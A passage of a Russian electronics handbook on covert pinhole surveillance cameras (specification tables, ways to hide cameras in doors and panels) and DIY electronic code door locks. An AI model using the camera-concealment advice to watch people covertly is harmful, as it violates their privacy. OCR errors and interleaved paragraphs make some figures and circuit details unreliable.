Наиболее надежным способом получения необходимой информации является скрытое телевизионное наблюдение. В качестве скрытых камер наблюдения, в основном, используют бескорпусные и миниатюрные как черно-белые, так и цветные телевизионные камеры. Такие видеокамеры обеспечивают скрытый видеоконтроль служебных помещений, лестничной площадки, входной двери и т. п. и являются абсолютно незаметным, информативным и безопасным способом наблюдения. Эти камеры комплектуются объективом с вынесенным зрачком. Из-за малых размеров входного зрачка объектива маскировка бескорпусных и миниатюрных телевизионных камер может быть самой различной: во входной двери, в панелях переговорного устройства, в щитах пожарной сигнализации, в щитах и приборах освещения и т. д.

Термин «вынесенный входной зрачок» (Pin-Hole) применяют в тех случаях, когда плоскость апертурной диафрагмы совпадает с входным зрачком, находящимся перед передней линзой объектива. В обычных объективах входной зрачок находится внутри объектива.

В случае, когда у объектива вынесен входной зрачок, уменьшение отверстия входного зрачка или расположение его в плоскости каких-либо загораживающих предметов (сеток, щелей, и т. п.) не приводит к уменьшению угла поля зрения объектива, а лишь снижает его светосилу. В зависимости от конструктивных особенностей конкретного объектива вынос зрачка осуществляется на 0, 5—5, 0 мм.

Именно возможность установки на указанном расстоянии перед передней линзой маленьких отверстий, сеток или щелей и обеспечивает настоящую маскировку камеры для проведения скрытого наблюдения.

В качестве примера на рис. 5. 8 изображена черно-белая миниатюрная телевизионная камера JT-241S. Данная камера может работать с различными объективами, которые имеют вынесенный входной зрачок. Технические характеристики объективов с вынесенным зрачком приведены в табл. 5. 3.

Таблица 5. 3. Технические характеристики объективов с вынесенным зрачком

Тип объектива

ivi-3

ivi-4

ivi-73

ivi-75

ivi-10

E.R-11

ivi-5

ivi-6

ivi-70

ivi-71

ivi-713

ivi-714

ivi-715

ivi-72

Фокусное расстояние, мм

6,6

7,7

8,5

7,7

3,6

3,(;4

4,4

3,11

3,34

4,3

6,5

5,0

19,56

1,43

Относительное отверстие

F:2.2

F:1,9

F:2,0

F:3,2

F:3,0

F:3,6

F:4,4

F:3,9

F:4,0

F:3,5

F:5,0

F:5,0

F:2,0

F:1,8

УГОЛ обзора.объестива

по диагонали/горизонтали/вертикали

для камер с различными размерами ПЗС матрицы

2/3"

-

84/48/68

112/60/86

-

-

-

-

-

-

-

1/2"

90/46/65

70/40/54

60/34/46

70/43/56

-

-

-

-

-

1/3"

50/20/39

42/24/33

110/60/85

110/60/85

90/46/65

-

125/70/90

86/46/62

50/30/39

65/39/52

16,5/9/12

-

1/4"

-

-

-

-

-

-

-

90/46/65

90/46/65

-

-

-

-

другие

-

-

-

-

-

-

-

-

-

-

-

-

110

Диаметр входного зрачка (макс), мм

3,0

4,0

4,2

2,4

1,2

1,0

1,0

0,8

0,8

1,2

1,2

1,0

9,5

0,8

Расстояние между входным зрачком и первой линзой объектива, мм

0,8

6,5

0,8

0,8

0,25

0,55

1,21

0,7

0,5

1,5

2,5

0,1

12,0

0,1

Задний фокальный отрезок, мм

5,7

5,54

5,05

5,28

2,57

2,08

2,62

2,52

2,08

2,08

2,84

2,0

18,83

1,09

Длина оптической системы, мм

14,8

13,74

16,05

18,88

7,98

10,63

19,76

1028

10,0

10,05

15,03

-

52,43

2,94

ЧКХ на пространственной частоте 100 лин/мм (в центре)

0,12

0,11

0,05

0,1

0,5

0,5

0,7

0,69

0,69

0,58

0,62

0,4

0,76

0,05

Резьбовое соединение

М12х0,5

М12х0,5

М12х0,5

М12х0,5

М7х0,5

М8х0,5

М12х0,5

М8х0,5

М12х0,5

М7х0,5

М7х0,75

М12х0,5

М12х0,5

0 4мм

Вес, г

3,9

4,8

5,7

6,4

1,7

2,6

4,1

3,8

2,1

2,2

2,5

2,1

24,2

0,9



Таблица 5.4. Бескорпусныс и миниатюрные черно-белые ПЗС-видеокамеры

5-21.jpg

PM200-L37

Computar (Япония)

1/3

380

0,3

3,8

F:4,5

61 «Игольное ушко»

32' 32' 18

9

196 ,

PM200-L38

Computar (Япония)

1/3

380

0,3

3,8

F:2,0

63

32' 32' 18

9

16.3

PMH-200L-38

Computar (Япония)

1/3

580

0,6

3,8

F:2,0

63

32'32' 23

9

280

SM-58

Тек pa (Россия)

1/3

380

0,2

3,6

F:1,4

50

37' 37' 27

12

90

VC-150

Kocom (Юж. Корея)

1/3

380

0,2

3,6

F:4,5

65, «Игольное ушко»

32'32' 18

12

145

VS-160s

Polestar (Юж. Корея)

1/3

380

0,1

3,6

F:1,8

63

38' 38' 23

12

115

WAT-660D-G3. 8

Watec (Япония)

1/4

380

0,8

3,8

F:2,0

51

30' 30- 16

9

190

WAT-660D-P3, 2

Watec (Япония)

1/4

380

4

3,2

F:4,5

59, «Игольное ушко»

30' 30' 16

9

206

WAT-660D-P3. 7

Watec (Япония)

1/4

.380

4

3,7

F:4,5

ушко»

30' 30'16

9

206

WAT-704R-P3. 7

Watec (Япония)

1/4

380

0,8

3,7

F:4,5

52, «Игольное ушко»

18'51

9

271

WAT-666GD

Watec (Япония)

1/4

380

1,6

3,8

F:2,0

«Потолочная»

53 ' 46

9

280

WAT-903

Watec (Япония)

1/3

350

2

5

F:1,6

67

40- 65-35

12

209



5-22.jpg

Рис. 5. 8. Миниатюрная телевизионная камера JT-241S

Миниатюрная телевизионная камера JT-241S со сменными объективами обеспечивает:

> наблюдение через входное отверстие диаметром 0, 3 —1, 2 мм с углом поля зрения до 110°;

> высокую чувствительность (0, 04 лк), позволяющую в темноте при инфракрасной подсветке видеть намного лучше, чем человеческий глаз;

> установку на любые элементы интерьера благодаря малым габаритным размерам телекамеры (39х39х20 мм);

> передачу телевизионного изображения по проводам, по оптико-волоконным жгутам и по радиоканалу (до 500 м при установке передатчика телевизионных сигналов);

> непрерывное скрытое наблюдение до 30 часов при установке автономного источника питания (аккумулятора);

> высокое качество изображения с разрешением 400 твл.

Миниатюрные телевизионные камеры по внешнему виду очень похожи друг на друга, поэтому кратко рассмотрим только их технические характеристики. Однако прежде отметим некоторую особенность их применения. Необходимо иметь в виду, что некоторые материалы, применяемые для маскировки объективов, типа "темное стекло", пропускают только небольшую часть видимого спектра и могут успешно работать при солнечном освещении, при освещении прожектором или обычными лампами накаливания. Но применение указанных материалов маскировки становится невозможным при освещении объекта более широкополосным источником света, например люминесцентными или галлогеновыми лампами.

Более подробно остановимся на технических характеристиках некоторых моделей телевизионных камер отечественного и зарубежного производства. В табл. 5. 4 приведены характеристики бескорпусных и миниатюрных черно-белых ТВ камер на основе матрицы ПЗС.

Таблица 5. 5. Бескорпусные и миниатюрные цветные ТВ камеры

Наименование изделия

ХС-41

WAT-205A

WAT-207A

DC-2000P

Фирма-изготовитель (страна)

Computer (Япония)

Watec (Япония)

Watec (Япония)

Polesta (Южная Корея)

Формат матрицы ПЗС, дюйм

1/2

1/4

1/4

1/3

Разрешение по горизонтали. твл

320

320

320

420

Минимальная освещенность, лк

10

8

Нет данных

1

Фокусное расстояние объектива, мм

4

3, 8

3, 8

Нет данных

Относительное отверстие объектива

F: 2, 0

F: 2, 0

F: 2, 0

Эл. затвор 1/50-1/100000

Угол обзора объектива (по горизонтали), град

51

51

51

Нет данных

Габаритные размеры, мм

55х60х30

23, 3х22, 3х57, 5

45, 5х47х29, 5

40х28+ 45х45

Напряжение питания, В

12

6

6

12

Примерная стоимость, USD

520

570

541

320


Бескорпусные и миниатюрные цветные ТВ камеры на основе матрицы ПЗС на отечественном рынке представлены сравнительно небольшим ассортиментом. Отличительными особенностями цветных ТВ камер являются сравнительно большие габариты и высокая стоимость. В табл. 5. 4 приведены основные технические характеристики бескопусных и миниатюрных цветных ТВ камер.

Рис. 5.8. Миниатюрная телевизионная камера JT-241S

Изображение: 

Таблица 5.4. Бескорпусныс и миниатюрные черно-белые ПЗС-видеокамеры

Изображение: 

5. 3. Телевизионные видеокамеры наблюдения.

5. 3. Телевизионные видеокамеры наблюдения

Обеспечить безопасность в современных условиях немыслимо без широкого использования технических средств. Однако сориентироваться в нынешнем изобилии различных телевизионных камер наблюдения очень сложно (рис. 5. 11). Телевизионные камеры наблюдения предназначены для видеоконтроля входных дверей, ворот, периметров и других объектов. Поэтому устанавливают их, как правило, на улице. В связи с этим к телевизионным камерам наблюдения предъявляются определенные требования по их конструктивному исполнению.

Телевизионная камера должна иметь законченную конструкцию для установки на внешних объектах при непосредственном контакте с окружающей средой без дополнительных защитных приспособлений. Корпус (гермобокс) телевизионной камеры наблюдения должен обеспечивать надежное функционирование оптики и электроники, особенно в плохих погодных условиях (дождь, снег и т. п.). Электронная схема термостабилизации должна обеспечивать постоянную температуру внутри термобокса (порядка+ 20°С) не зависимо от температуры наружного воздуха, а система обогрева стекла должна исключать его обмерзание в зимнее время. Телевизионная камера наблюдения должна обладать высокой чувствительностью, обеспечивать надежную идентификацию объектов при любых условиях освещенности и круглосуточный визуальный контроль охраняемого пространства. Помимо этого, потребляемый ток камеры от источника питания не должен превышать десяток-сотен миллиампер.

Кронштейны крепления и поворотные устройства телевизионных камер должны обладать повышенной механической прочностью и обеспечивать максимальную зону обзора.

Телевизионная камера наблюдения должна быть адаптирована к сложным российским климатическим условиям — диапазон рабочих температур должен быть от -40°С до+ 50°С.

Учитывая широкий спектр различных моделей ТВ ПЗС-видеокамер наблюдения на российском рынке, в качестве примера приведем технические характеристики только одного изделия каждой фирмы. Это позволит сориентироваться среди многообразия продукции ведущих фирм мира, занимающих главенствующее положение в данной области.

В табл. 5. 6 приведены основные технические характеристики отечественных и зарубежных черно-белых телевизионных видеокамер с электронным затвором.

В табл. 5. 7 приведены основные технические характеристики цветных телевизионных видеокамер с электронным затвором.

5-31.jpg

Рис. 5. 11. Телевизионные камеры наблюдения

Таблица 5. 6. Черно-белые телевизионные видеокамеры

5-32.jpg

Таблица 5. 7. Цветные телевизионные ПЗС-видеокамеры

Наименование изделия

СС-312

CD-08

JAI-2080

NCD-5130

VTC-1400

WAT-202B

WV-CP210

Фирма- изготовитель (страна)

Polestar (Южная Корея)

Computar (Япония)

Jai (Япония)

Vista (Япония)

Santec (Германия-Тайвань)

Watec (Япония)

Panasonic (Япония)

Формат матрицы ПЗС, дюйм

1, 3

1/3

1/3

1/3

1/3

1/3

1/3

Разрешение по горизонтали, твл

350

430

450

470

330

420

330

Минимальная освещенность, лк

2

1

3

2, 2

2

3

1, 5

Фокусное расстояние объектива, м

-

6, 5 - 52

6-90

-

-

-

-

Относительное отверстие объектива

-

F: 1, 8

-

-

F: 1, 4

F: 1, 2

F: 1, 2

Габаритные размеры, мм

-

45х74х48

-

-

65х55х142

44х44х53

67х65х118

Напряжение питания, В

+ 12

+ 12

+ 12

220 (+ 12)

+ 12

+ 12

220

Примерная стоимость, USD

380

1020

1780

687

440

715

580


Рис. 5.11. Телевизионные камеры наблюдения

Изображение: 

Таблица 5.6. Черно-белые телевизионные видеокамеры

Изображение: 

Рис. 5.1. Преобразование оптического изображения в электрический сигнал

Изображение: 

Рис. 5.2. Зависимость угла обзора от формата матрицы ПЗС

Изображение: 

Рис. 5.3. Размеры матриц ПЗС различных форматов

Изображение: 

Рис. 5.4. Применение телекамер в составе охранной системы

Изображение: 

6. Глава 6. ПРАКТИЧЕСКИЕ СХЕМЫ УСТРОЙСТВ СИГНАЛИЗАЦИИ И ОГРАНИЧЕНИЯ ДОСТУПА.

ГЛАВА 6 ПРАКТИЧЕСКИЕ СХЕМЫ УСТРОЙСТВ СИГНАЛИЗАЦИИ И ОГРАНИЧЕНИЯ ДОСТУПА.

6. 1. Простейшие замки и ключи.

6. 1. Простейшие замки и ключи

Возможных вариантов построения электрических, магнитных и электронных замков и ключей существует великое множество. В этих устройствах в качестве исполнительного механизма обычно используется электромагнит постоянного или переменного тока. При подаче напряжения питания на обмотку электромагнита его сердечник втягивается внутрь и через механические тяги освобождает запирающее устройство замка двери.

6. 1. 1. Простейший электрический замок

6. 1. 1. Простейший электрический замок

Этот замок прост в изготовлении, содержит минимум деталей и практически не требует настройки. Принципиальная схема такого замка приведена на рис. 6. 1.

При нажатии на кнопку SB1 замыкается цепь питания обмотки электромагнита: плюс источника питания, обмотка электромагнита YA1, замкнутые контакты кнопки SB1, минус источника питания. Срабатывает электромагнит YA1, его сердечник втягивается внутрь и через механическую тягу приводит в действие засов замка двери. Вместо кнопки, использование которой по понятным причинам на

6-1-11.jpg

Рис. 6. 1 Однокнопочный замок

внешней стороне двери нецелесообразно, может быть использован геркон, подключенный к точкам А и В схемы вместо кнопки SB1. Геркон SA1 располагают скрытно в любом удобном месте на двери или стене. При приближении постоянного магнита к месту расположения геркона, его контакты замыкаются и электромагнит YA1 срабатывает. Кнопку SB1 и геркон SA1 можно включить и параллельно. В этом случае кнопку SB1 устанавливают внутри помещения и ее используют для дистанционного открывания двери изнутри. Геркон SA1 размещают так, как это было описано выше.

Кроме этого, секретным ключом такого замка может служить, например, проволочная перемычка, которой замыкают два контакта, замаскированные на наружной стороне двери или поблизости от нее. В качестве контактов можно использовать, например, разъем от аудиоаппаратуры типа СГ-1 или другие стандартные разъемы любого типа: круглые, плоские, с любым количеством контактов. В последнем случае используются обе части разъема: штыревая и гнездовая. Причем, чем больше штырьков в используемом разъеме, тем более сложную конфигурацию могут иметь перемычки в ключе (ответной части) и тем большей секретности замка можно достичь.

Для питания устройства лучше всего использовать источник постоянного тока с напряжением+ 12... 36 В. Применение более высокого напряжения нежелательно, т. к. требует хорошей изоляции цепей с целью соблюдения требований по технике безопасности. В качестве электромагнита может быть использован любой, подходящего размера, обеспечивающий необходимое тяговое усилие для открывания замка при используемом источнике питания.

Рис. 6.1 Однокнопочный замок

Изображение: 

6. 1. 2. Замок с магнитным ключом.

6.1.2. Замок с магнитным ключом

Работа этого замка основана на использовании постоянных магнитов и герконов. Это позволяет получить надежные с точки зрения устойчивости работы замки и ключи. Принципиальная схема одного из таких замков представлена на рис. 6. 2.

6-1-21.jpg

Рис. 6. 2 Замок с магнитным ключом

Замок состоит из четырех герконов SA1, SA2, SA3, SA4 и электромагнита YA1. Причем, герконы SA1, SA2, SA4 имеют нормально разомкнутые контакты, а геркон SA3 — нормально замкнутые. Герконы могут устанавливаться в произвольной последовательности, количество их может быть различным, что способствует повышению секретности замка.

Замок и ключ имеют следующую конструкцию (рис. 6. 3). Герконы SA1— SA4 устанавливаются вдоль отверстия, в которое вставляется ключ с постоянными магнитами. Расстояние между магнитами и герконами должно быть не более 5 мм. Расстояние между герконами должно быть равно расстоянию меж-

6-1-22.jpg

Рис. 6. 3. Конструкция замка и ключа

ду центрами магнитов ключа. После того как ключ будет вставлен в отверстие замка до упора, магниты 1, 2, 4 будут находиться напротив герконов SA1, SA2, SA4 соответственно, что приведет к замыканию контактов последних. Поскольку контакты геркона SA3 замкнуты (магнит на него не воздействует), через обмотку электромагнита YA1 начинает протекать ток, вызывая его срабатывание. Если кто-нибудь попытается открыть такой замок, вставив вместо магнитного ключа магнит подходящего размера, то это приведет к срабатыванию всех герконов. При этом контакты геркона SA3 разомкнутся и прервут цепь питания электромагнита YA1. Замок останется в закрытом состоянии.

Герконы могут быть любыми, например КЭМ-1. Однако ток срабатывания электромагнита не должен превышать предельно допустимый ток коммутации герконов. В противном случае вместо электромагнита YA1 необходимо включить реле, контактами которого и будет включаться последний.

Магниты для ключа можно использовать от магнитных шашек или шахмат, подходящие по размерам. Электромагнит YA1 может быть любым, подходящим по таким параметрам, как напряжение питания, ток, тяговое усиление и т. д.

Рис. 6.2 Замок с магнитным ключом

Изображение: 

Рис. 6.3. Конструкция замка и ключа

Изображение: 

6. 1. 3. Кодовый замок на переключателях.

6. 1. 3. Кодовый замок на переключателях

Этот замок имеет 4 внутренних (для установки кода) и 4 внешних переключателя (для набора кода). На рис. 6. 4. показана схема такого кодового замка.

Переключатели SA1 — SA4, предназначенные для установки кода, и электромагнит YA1, сердечник которого механически связан с защелкой замка, находятся с внутренней стороны двери, а переключатели SA5— SA8, используемые для набора кода при входе, — на наружной стороне двери. Если положение хотя бы одного из переключателей SA5 — SA8 будет отличаться от положения соответствующего переключателя из группы SA1 — SA4, цепь питания электромагнита будет разорвана. На рис. 6. 4 положения переключателей соответствуют правильному набору кода.

Переключателями SA1 —SA4 устанавливают условный код замка перед выходом из помещения, и пока переключателями SA5—SA8 не будет набран такой же код, открыть дверь не удастся. С увеличением числа переключателей «секретность» замка повышается.

6-1-31.jpg

Рис. 6. 4. Замок на переключателях

Рис. 6.4. Замок на переключателях

Изображение: 

6.1.10. Дверной кодовый замок с одной кнопкой.

6. 1. 10. Дверной кодовый замок с одной кнопкой

Замок управляется одной кнопкой, что является заметным преимуществом, по сравнению с большинством других подобных устройств. Питается он от сети переменного тока напряжением 220 В. В режиме ожидания устройство отключено от сети и не потребляет электроэнергию.

Принципиальная схема дверного кодового замка представлена на рис. 6. 24. В исходном состоянии (кнопка SB1 не нажата) напряжение сети на устройство не подается. При нажатии на кнопку SB1 напряжение сети поступает к устройству. Избыточное напряжение сети гасится конденсатором С1, а необходимое для работы прибора напряжение выпрямляется диодным мостом VD1 и стабилизируется на уровне 9 В стабилизатором, выполненном на элементах R8, VD4, VT1. Конденсаторы С4 и С6 уменьшают пульсации напряжения питания. Резистор R1 ограничивает бросок тока через диодный мост в момент включения устройства. Резистор R2 необходим для разряда конденсатора С1 после отключения устройства от сети. Со стабилизатора напряжение питания+ 9 В подается на микросхемы (DD1 — вывод 16; DD2, DD3, DD4, DD5, DD6 — вывод 14) и другие элементы схемы. В момент включения питания цепь C2R3VD3R6 вырабатывает положительный импульс начальной установки RS-триггера на элементах DD3. 1, DD3. 2 (вывод 13) и сдвигающего регистра DD1 (выводы 6, 14). Этот же импульс на время своей длительности запрещает работу генератора тактовых импульсов на элементах DD2. 1, DD2. 2 (вывод 5). Сигнал нулевого уровня с последнего разряда регистра сдвига DD1 (вывод 2) открывает транзистор VT2, в результате чего срабатывает реле К1, которое, в свою очередь, блокирует кнопку SB1 своими контактами К 1. 1. Контактами К 1. 2 и К 1. 3 кнопка SB1 подключается ко входу D регистра сдвига DD1 (вывод 7) и общему проводу схемы.

После окончания импульса начальной установки генератор на элементах DD2. 1 и DD2. 2 начинает вырабатывать прямоугольные импульсы, следующие с частотой около 2 Гц. Проходя через ключевой элемент DD3. 3, эти импульсы

6-1-101.jpg

Рис. 6. 24. Дверной кодовый замок с одной кнопкой управления

разрешают работу генератора колебаний звуковой частоты 1000 Гц, собранного на элементах DD2. 3 и DD2. 4. Пачки импульсов генератора усиливаются по току транзистором VT3 и преобразуются динамической головкой ВА1 в звуковые колебания.

Одновременно прямоугольные импульсы с вывода 3 элемента DD2. 2 поступают на входы С (выводы 9, 1) регистра DD1, осуществляя тем самым сдвиг информации на один разряд по окончании каждой звуковой посылки.

Таким образом, если в момент окончания звуковой посылки кнопка SB1 отпущена, то на информационный вход D (вывод 7) регистра через резистор R5 подается напряжение высокого уровня, значение которого записывается в первый разряд регистра. Соответственно, если кнопка SB1 нажата, в первый разряд регистра DD1 записывается сигнал низкого уровня. В результате, после окончания семи звуковых посылок в первые семь разрядов регистра DD1 будет записан некоторый код, определяемый тем, нажата или отпущена была кнопка в момент окончания соответствующих звуковых посылок. Этот код сравнивается микросхемами DD4, DD5 и DD6 с кодом, который устанавливается перемычками на контактах 1—7 (выводы 9, 13, 1, 6 микросхемы DD4; выводы 6, 9, 13 микросхемы DD5). На эти контакты подается либо напряжение+ 9 В, либо нулевое напряжение, в зависимости от выбранного семизначного кода.

При несовпадении значений набранного и установленного кода на всех выходах сравнивающих элементов микросхем DD4 и DD5 устанавливаются значения логической единицы. Это ведет к появлению логического нуля на выходах элементов DD6. 1 и DD6. 2, а также логической единицы на выходе элемента DD3. 4. Этот единичный уровень напряжения разрешает подачу непрерывного звукового сигнала (после переключения RS-триггера на элементах DD3. 1 и DD3. 2 с элемента DD3. 3 на генератор поступает нулевой уровень) и одновременно обнуляет все триггеры регистра сдвига DD1. Если после набора кода кнопка SB1 будет отпущена, сигнал высокого уровня со входа D регистра DD1 спустя 8 тактов появится на последнем (вывод 2) выходе регистра DD1, транзистор VT2 закроется, реле К1 обеспечится и устройство отключится от сети.

Таким образом, при правильном наборе кода сигнал звонка звучит так:

семь коротких звуковых посылок длительностью по 0, 25 с и одна длинная — около 4 с. При этом единичный уровень с вывода 3 элемента DD3. 4 на время 4 с поступает на базу транзистора VT4, что ведет к открыванию последнего и срабатыванию реле К2, которое своими контактами включает исполнительный механизм замка.

При неправильном наборе кода первый же сигнал высокого уровня на выходе регистра закроет транзистор VT2 и звонок отключится от сети после восьми и более коротких звуковых сигналов.

Резистор R1 типа МЛТ-0, 5, остальные — МЛТ-0,125. Конденсатор С1 должен быть рассчитан на напряжение не менее 400 В — типа К73-11, К73-17, МБМ или другой. Транзистор VT1 можно заменить на КТ817, КТ805, КТ829. Транзисторы VT2—VT4 — любые маломощные. Реле К1, К2 типа РЭС 22 (паспорт РФ4. 500. 129).

При использовании вместо динамической головки ВА1 пьезокерамического излучателя схема несколько упрощается. Пьезокерамический излучатель, например типа ЗП-1, подключается между выводом 10 элемента DD2. 4 и общим проводом или между выводом 10 и выводами 8, 9 элемента DD2. 4. При этом из схемы исключаются элементы R 10, R 11, VT3, ВА1.

Проверку и настройку устройства следует проводить, запитав его (вместо сети) от источника постоянного тока напряжением 12—14 В, предварительно закоротив конденсатор С1 проволочной перемычкой. При правильном монтаже и исправных деталях устройство начинает работать сразу. Подборкой сопротивления резистора R4 или емкости конденсатора СЗ устанавливается период появления тональных посылок. Подборкой сопротивления резистора R7 и емкости конденсатора С5 устанавливается частота звукового сигнала.

После окончания проверки и настройки перемычку с конденсатора С1 необходимо удалить. Устройство можно подключать к сети переменного тока.

Устройство выполнено на печатной плате размером 90х100 мм (рис. 6. 25) из двухстороннего фольгированного стеклотекстолита. Размещение деталей на плате показано на рис. 6. 26.

6-1-102.jpg

Рис.. 6. 25. Печатная плата замка с одной кнопкой

6-1-103.jpg

Рис. 6. 26. Размещение деталей на плате замка с одной кнопкой

Рис. 6.24. Дверной кодовый замок с одной кнопкой управления

Изображение: 

Рис. 6.26. Размещение деталей на плате замка с одной кнопкой

Изображение: 

Рис.. 6.25. Печатная плата замка с одной кнопкой

Изображение: 

6.1.11. Кодовый замок с одной кнопкой и четырехзначным кодом.

6. 1. 11. Кодовый замок с одной кнопкой и четырехзначным кодом

Это простое и надежное устройство с минимальным количеством микросхем и кнопок. Схема замка позволяет устанавливать четырехзначный код и управлять им с помощью одной кнопки.

Принципиальная схема замка представлена на рис. 6. 27. Управление набором кода производится кнопкой SB1. На элементах DD1. 1 и DD1. 2 собран Rs-триггер, который служит для подавления дребезга контактов, возникающих в механических переключателях. В исходном состоянии кнопка находится в верхнем по схеме положении. При этом на выводе 3 элемента DD1. 1 устанавливается единичный уровень.

При включении питания (контактами кнопки SB2), которое происходит при закрывании двери, через диод VD2 и резистор R6 заряжается конденсатор С2. Это приводит к появлению короткого положительного импульса на входах R микросхем DD2, DD3, устанавливая последние в нулевое состояние. Микросхемы DD2, DD3 готовы к приему установленного кода.

После заряда конденсатора СЗ уровень лог. «1» с вывода 3 элемента DD1. 1 через резистор R3 поступает на вход элемента DD1. 3. Нулевой уровень на выходе последнего приводит к включению светодиода HL1, извещающего о том, что система находится в рабочем состоянии и устройство готово к приему первой цифры кода.

В момент нажатия на кнопку SB1 на выводе 3 элемента DD1. 1 устанавливается нулевой уровень, и конденсатор СЗ быстро разряжается через диод VD1. Для набора цифры кнопку SB1 нажимают соответствующее число раз.

После того как первая цифра набрана, кнопку SB1 отпускают и ждут зажигания светодиода HL1. Если первая цифра набрана правильно, то на выходе мультиплексора DD4 устанавливается логическая единица и начинается заряд конденсатора С5 через резистор R8. При отпускании кнопки SB1 на выводе 3 элемента DD1. 1 вновь появляется единичный уровень и конденсатор СЗ медленно заряжается через резистор R3. В момент достижения на конденсаторе СЗ напряжения логической единицы счетчик DD3 переходит в следующее состояние. Светодиод HL1 снова зажигается, т. е. устройство готово к приему второй цифры.

6-1-111.jpg

Рис. 6. 27. Замок с одной управляющей кнопкой

Одновременно уровень лог. «0» с выхода DD1. 3 через диод VD6 поступает на вывод 9 элемента DD1. 4. Однако состояние элемента DD1. 4 не изменится, т. к. конденсатор С5 заряжен до уровня логической единицы.

Так происходит до тех пор пока счетчик DD3 не установится в положение «5». При этом единичный уровень на выходе 1 счетчика DD3 через диод VD5 заблокирует элемент DD1. 4 и, одновременно, поступит на базу транзистора VT1. Транзистор VT1 откроется, реле К1 сработает и своими контактами приведет в действие исполнительный механизм замка. Схема будет находиться в этом состоянии до тех пор пока не будет открыта дверь и не разомкнется кнопка SB2, при этом, после закрытия двери, устройство перейдет в исходное состояние.

Если при наборе кода одна из цифр была набрана неправильно, то на выходе мультиплексора DD4 (вывод 3) единичный уровень не установится, и после отпускания кнопки SB1 и заряда конденсатора СЗ на входах элемента DD1. 4 будут нулевые уровни, а на его выходе — единичный. Положительный импульс через конденсатор С4 и диод VD3 поступит на входы R счетчиков DD2, DD3 и установит их в нулевое состояние.

Так как для расшифровки кода используется десятичный счетчик с дешифратором (DD2), который последовательно складывает цифры кода, то на уста-

6-1-112.jpg

Рис. 6. 28. Печатная плата однокнопочного замка

Принципиальная схема устройства представлена на рис. 6. 30. Работает устройство следующим образом. Возле двери или на ней устанавливается один светодиодный семисегментный индикатор HL1, цифры на котором постоянно меняются от нуля до девяти. Для набора кода нужно, наблюдая за индикатором,

6-1-113.jpg

Рис. 6. 30. Кодовый замок без кнопок управления

6-1-114.jpg

Рис. 6. 29. Размещение деталей на плате замка

новку кода накладываются некоторые ограничения. При наборе кода при помощи кнопки SB1 счетчик DD2 может несколько раз досчитать до своего предельного значения и перейти в нулевое состояние. Задача состоит в том, чтобы при наборе очередного кодового числа счетчик DD2 не останавливался на нулевом значении (вывод 3 DD2).

На схеме установлен код «1682». При последовательном сложении импульсов мы получим: «I», 1+ 6 = "7", 7 + 8 = 15 («5»), 5 + 2 = "7". Перемычки устанавливаются на те выходы DD2, которые соответствуют последней цифре суммы предыдущего положения счетчика со следующей цифрой кода. При этом необходимо помнить, чтобы последняя цифра суммы не была равна нулю.

Для надежного набора кода рекомендуется набирать первую цифру умышленно неверно. Это приводит устройство в исходное состояние и оно готово к приему основного кода.

Питание замка осуществляется от любого стабилизированного источника питания напряжением 9—12 В.

Печатная плата размером 48х80 мм выполнена из двухстороннего фольгированного стеклотекстолита. Вид платы с двух сторон приведен на рис. 6. 28. Размещение деталей на этой плате изображено на рис. 6. 29.

Конденсатор СЗ должен иметь минимальный ток утечки. Реле К1 — РЭС 47, паспорт РФ 4. 500. 421.

Устройство, собранное из исправных деталей, в настройке не нуждается.

Рис. 6.27. Замок с одной управляющей кнопкой

Изображение: 

Рис. 6.28. Печатная плата однокнопочного замка

Изображение: 

Рис. 6.29. Размещение деталей на плате замка

Изображение: 

Рис. 6.30. Кодовый замок без кнопок управления

Изображение: 

6.1.12. Кодовый замок без кнопок управления.

6.1.12. Кодовый замок без кнопок управления

Характерной особенностью этого замка является отсутствие кнопок управления на наружной стороне двери. Четырехзначный код вводится несильными ударами по дверному замку в момент появления на индикаторе соответствующей цифры. Код состоит из четырех цифр, от нуля до девяти, причем цифры набираются только в определенной последовательности.

Принципиальная схема устройства представлена на рис. 6. 30. Работает устройство следующим образом. Возле двери или на ней устанавливается один светодиодный семисегментный индикатор HL1, цифры на котором постоянно меняются от нуля до девяти. Для набора кода нужно, наблюдая за индикатором,

6-1-121.jpg

Рис. 6. 30. Кодовый замок без кнопок управления

несильно ударять по двери или замку в те моменты, когда на индикаторе устанавливается соответствующая цифра кодовой последовательности. Например, для набора кода «1539» нужно негромко стукнуть в дверь тогда, когда на индикаторе высвечивается «I», затем когда «5», «З» и, наконец, «9». Причем набор цифр можно производить и за несколько циклов, а не обязательно во время одного прохода. Важно чтобы удар был сделан вовремя. Если код набран правильно, то сработает исполнительное устройство и можно входить. Если хотя бы один из ударов был произведен не вовремя, включается звуковая сигнализация, которая звучит около минуты, затем схема переходит в исходное состояние и можно повторить набор кода.

После включения питания датчик включается с задержкой в полминуты, необходимой для выхода и закрывания двери, затем схема переходит в ждущий режим.

В основе работы схемы лежит использование сенсорного датчика В1 — головки от старого пьезокерамического звукоснимателя. Ее иглу прижимают к замку или двери. При ударах, акустические и механические колебания преобразуются датчиком В1 в электрические и поступают на вход операционного усилителя DA1. Коэффициент усиления последнего регулируется резистором R14. Усиленные колебания поступают на базу транзистора VT1 через дифференцируемую цепь C9R15. Каскад на транзисторе VT1 преобразует входные колебания в короткие отрицательные импульсы. Эти импульсы через элемент DD6. 1 поступают на формирователь на элементах DD6. 2 и DD6. 3. Блокировка входа формирователя во время сигнализации и при выдержке после включения выполняется закрыванием элемента DD6. 1 единичным уровнем, поступающим на вывод 12.

Тактовый генератор собран на элементах DD1. 1, DD1. 2. Он вырабатывает прямоугольные импульсы с частотой следования около 4 Гц. Эти импульсы поступают на два счетчика: кодовый на микросхеме DD2 и контрольный — на микросхеме DD7, на выходе которого включен индикатор HL1. Индикатор HL1 и счетчик DD7 монтируются на отдельной плате (рис. 6. 31) и соединяются с основной платой четырехпроводным кабелем.

При счете от нуля до девяти единичный уровень появляется на соответствующем выходе счетчика-дешифратора DD2. Одновременно на индикаторе HL1 зажигаются цифры от нуля до девяти. Сигналы с выходов счетчика DD2 поступают на электронные ключи, входящие в состав микросхемы DD3, и, через диоды VD1 —VD6, на вывод 6 элемента DD5. 2.

6-1-122.jpg

Рис.. 6. 31. Печатная плата индикатора и размещение деталей на ней

